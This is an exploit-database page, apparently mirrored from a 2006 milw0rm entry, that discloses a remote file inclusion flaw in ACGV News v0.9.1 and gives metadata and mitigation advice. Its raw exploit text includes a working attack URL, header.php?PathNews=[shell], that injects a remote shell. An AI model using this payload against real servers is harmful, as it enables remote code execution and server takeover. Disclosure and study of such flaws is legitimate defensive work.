header-logo
Suggest Exploit
vendor:
ACGV News
by:
ERNE
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: ACGV News
Affected Version From: v0.9.1
Affected Version To: v0.9.1
Patch Exists: YES
Related CWE: N/A
CPE: a:acgv_news:acgv_news:0.9.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ACGV News v0.9.1 – Remote File Include Vulnerabilities

ACGV News v0.9.1 is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can lead to the attacker gaining access to sensitive information, such as passwords, or even full control of the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. This can be done by using a whitelist of accepted characters and rejecting any input that does not match the whitelist.
Source

Exploit-DB raw data:

# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# ACGV News v0.9.1 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=1420
 
# Script  :  ACGV News v0.9.1
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_Lejyoner
 
# Vulnerable :
 
     http://www.site.com/ACGVnews/header.php?PathNews=[shell]

# milw0rm.com [2006-09-07]

Navigation

Suggest Exploit

Services By CQR